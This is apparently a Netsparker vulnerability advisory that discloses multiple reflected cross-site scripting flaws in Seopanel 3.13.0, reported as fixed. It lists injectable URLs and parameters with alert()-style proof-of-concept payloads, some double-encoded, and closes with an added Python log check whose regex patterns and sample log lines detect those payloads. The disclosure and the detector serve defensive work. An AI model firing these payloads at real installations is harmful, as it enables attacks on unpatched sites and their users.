Multiple Reflected Cross-site Scripting Vulnerabilities in Seopanel 3.13.0

Information
--------------------
Advisory by Netsparker
Name: Reflected Cross-site Scripting Vulnerabilities in Seopanel
Affected Software: Seopanel
Affected Versions: 3.13.0
Homepage: https://www.seopanel.in
Vulnerability: Multiple Reflected Cross-site Scripting Vulnerabilities
Severity: Medium
Status: Fixed
CVSS Score (3.0): 6.3
Netsparker Advisory Reference: NS-18-022

Technical Details
--------------------
URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=show&nsparameter=aa');alert(1)//
Parameter Name: nsparameter
Parameter Type: GET
Attack Pattern: aa');alert(1)//

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?%27%2balert(0x00BCA2)%2b%27
Parameter Name: Query Based
Parameter Type: Query String
Attack Pattern: %27%2balert(0x00BCA2)%2b%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=http%3A%2F%2F&title=%27%252Balert(9)%252B%27&description=&keywords=
Parameter Name: title
Parameter Type: GET
Attack Pattern: %27%252Balert(9)%252B%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=%2527%2522--%253E%253C%252Fstyle%253E%253C%252FscRipt%253E%253CscRipt%253Ealert%25280x00B7E7%2529%253C%252FscRipt%253E&userid=1&name=&url=http%3A%2F%2F&title=&description=&keywords=
Parameter Name: sec
Parameter Type: GET
Attack Pattern: %2527%2522--%253E%253C%252Fstyle%253E%253C%252FscRipt%253E%253CscRipt%253Ealert%25280x00B7E7%2529%253C%252FscRipt%253E

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?search_name=Smith&userid=1&stscheck=3&nsextt=%27%252Balert(9)%252B%27
Parameter Name: nsextt
Parameter Type: GET
Attack Pattern: %27%252Balert(9)%252B%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=http%3A%2F%2F&title=&description=&keywords=%27%252Balert(9)%252B%27&search_name=&stscheck=select
Parameter Name: keyword
Parameter Type: GET
Attack Pattern: %27%252Balert(9)%252B%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=%27%252Balert(9)%252B%27&url=http%3A%2F%2F&title=&description=&keywords=&search_name=&stscheck=select
Parameter Name: name
Parameter Type: GET
Attack Pattern: %27%252Balert(9)%252B%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=http%3A%2F%2F&title=&description=&keywords=&search_name=%27%252Balert(9)%252B%27&stscheck=select
Parameter Name: search_name
Parameter Type: GET
Attack Pattern: %27%252Balert(9)%252B%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?search_name=Smith&userid=1&stscheck=3&%27%2balert(0x0105C0)%2b%27=nsextt
Parameter Name: nsparamname
Parameter Type: GET
Attack Pattern: %27%2balert(0x0105C0)%2b%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?menu_selected=themes-manager&start_script=%27%252Balert(9)%252B%27&sec=activate&theme_id=2&pageno=
Parameter Name: start_script
Parameter Type: GET
Attack Pattern: %27%252Balert(9)%252B%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?search_name=Smith&userid=%27%252Balert(9)%252B%27&stscheck=3
Parameter Name: userid
Parameter Type: GET
Attack Pattern: %27%252Balert(9)%252B%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=%27%252Balert(9)%252B%27&title=&description=&keywords=
Parameter Name: url
Parameter Type: GET
Attack Pattern: %27%252Balert(9)%252B%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?search_name=Smith&userid=1&stscheck=%27%252Balert(9)%252B%27
Parameter Name: stscheck
Parameter Type: GET
Attack Pattern: %27%252Balert(9)%252B%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?menu_selected=themes-manager&start_script=themes-manager&sec=activate&theme_id=2&pageno=%27%252Balert(9)%252B%27
Parameter Name: pageno
Parameter Type: GET
Attack Pattern: %27%252Balert(9)%252B%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=http%3A%2F%2F&title=&description=%27%252Balert(9)%252B%27&keywords=
Parameter Name: description
Parameter Type: GET
Attack Pattern: %27%252Balert(9)%252B%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?menu_selected=themes-manager&start_script=themes-manager&sec=activate&theme_id=%27%252Balert(9)%252B%27&pageno=
Parameter Name: theme_id
Parameter Type: GET
Attack Pattern: %27%252Balert(9)%252B%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/directories.php?sec=directorymgr&dir_name=&stscheck=1&capcheck=x%22%20onmouseover%3dalert(0x00BAF1)%20x%3d%22&pagerank=&langcode=
Parameter Name: capcheck
Parameter Type: GET
Attack Pattern: x%22%20onmouseover%3dalert(0x00BAF1)%20x%3d%22

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/seo-plugins-manager.php?sec=listinfo&pid=1&pageno=x%22%20onmouseover%3dalert(0x00EC00)%20x%3d%22
Parameter Name: pageno
Parameter Type: GET
Attack Pattern: x%22%20onmouseover%3dalert(0x00EC00)%20x%3d%22

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/settings.php?category=x%22%20onmouseover%3dalert(0x00B43C)%20x%3d%22
Parameter Name: category
Parameter Type: GET
Attack Pattern: x%22%20onmouseover%3dalert(0x00B43C)%20x%3d%22

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/themes-manager.php?sec=activate&theme_id=2&pageno=%27%2balert(0x018E52)%2b%27
Parameter Name: pageno
Parameter Type: GET
Attack Pattern: %27%2balert(0x018E52)%2b%27

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?sec=forgot
Parameter Name: search_name
Parameter Type: POST
Attack Pattern: x%22+onmouseover%3dnetsparker(0x00497F)+x%3d%22

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?sec=forgot
Parameter Name: report_type
Parameter Type: POST
Attack Pattern: x%22+onmouseover%3dnetsparker(0x00497F)+x%3d%22

URL: http://testcases-vdb.ns.local:8081/seopanel/seopanel-3.13.0/?'"-->
Parameter Name: Query Based
Parameter Type: Query String
Attack Pattern: '"-->

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/index.php?'"-->
Parameter Name: Query Based
Parameter Type: Query String
Attack Pattern: '"-->

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?sec=forgot
Parameter Name: code
Parameter Type: POST
Attack Pattern: x%22+onmouseover%3dnetsparker(0x00497F)+x%3d%22

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?'"-->
Parameter Name: Query Based
Parameter Type: Query String
Attack Pattern: '"-->

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?sec=forgot
Parameter Name: email
Parameter Type: POST
Attack Pattern: x%22+onmouseover%3dnetsparker(0x00497F)+x%3d%22

URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/support.php?'"-->
Parameter Name: Query Based
Parameter Type: Query String
Attack Pattern: '"-->

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
28th June 2018 - First Contact
13th September 2018 - Vendor Fixed
30th November 2018 - Advisory Released

Credits & Authors
--------------------
These issues have been discovered by Zekvan Arslan while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine's unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.
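
Added example (not part of the Netsparker advisory or of Seopanel's code): a log check for operators of Seopanel 3.13.0 installations, which flags requests whose query string matches the shapes of the attack patterns listed under Technical Details, including the double-encoded ones (%252B, %2527). The rule names, the regular expressions, the access-log layout and the sample lines are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote

# Heuristic rules inferred from the shapes of the advisory's attack patterns
# (an assumption of this example, not Netsparker's detection logic).
RULES = {
    "js-string-breakout": re.compile(r"""['"]\s*(?:\+|\)\s*;)\s*[\w.]+\s*\("""),
    "attribute-injection": re.compile(r"""['"]\s+on\w+\s*=""", re.I),
    "tag-breakout": re.compile(r"""<\s*/?\s*(?:script|style)\b|['"]-->""", re.I),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_layers(value, max_depth=3):
    """Yield the raw value, then each further percent-decoding of it."""
    yield value
    for _ in range(max_depth):
        decoded = unquote(value)
        if decoded == value:
            return
        value = decoded
        yield value

def classify(target):
    """Return (matched rule names, decoding depth of the first match)."""
    query = target.partition("?")[2]  # whole query string: covers parameter names too
    hits, first_depth = set(), None
    for depth, layer in enumerate(decode_layers(query)):
        for text in (layer, layer.replace("+", " ")):  # '+' may be a form-encoded space
            for name, rule in RULES.items():
                if rule.search(text):
                    hits.add(name)
                    first_depth = depth if first_depth is None else first_depth
    return sorted(hits), first_depth

def scan(log_lines):
    """Return (client, path, rules, depth) for each suspicious request line."""
    findings = []
    for m in filter(None, map(REQUEST.match, log_lines)):
        rules, depth = classify(m.group(2))
        if rules:
            findings.append((m.group(1), m.group(2).partition("?")[0], rules, depth))
    return findings

# Constructed sample access-log lines (documentation addresses, made-up timestamps).
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Dec/2018:09:58:12 +0000] "GET /seopanel/admin-panel.php?sec=create&userid=1&name=O%27Brien+%26+Sons&url=http%3A%2F%2Fexample.com HTTP/1.1" 200 4312',
    '203.0.113.7 - - [01/Dec/2018:10:00:01 +0000] "GET /seopanel/admin-panel.php?sec=create&userid=1&title=%27%252Balert(9)%252B%27 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Dec/2018:10:00:02 +0000] "GET /seopanel/settings.php?category=x%22%20onmouseover%3dalert(0x00B43C)%20x%3d%22 HTTP/1.1" 200 2981',
    '203.0.113.7 - - [01/Dec/2018:10:00:03 +0000] "GET /seopanel/admin-panel.php?sec=%2527%2522--%253E%253C%252FscRipt%253E&userid=1 HTTP/1.1" 200 5120',
]
```

A depth of 2 in a finding means the pattern only appears after two rounds of percent-decoding, as with the advisory's %252B and %2527 patterns; a depth of 0 means it was sent unencoded.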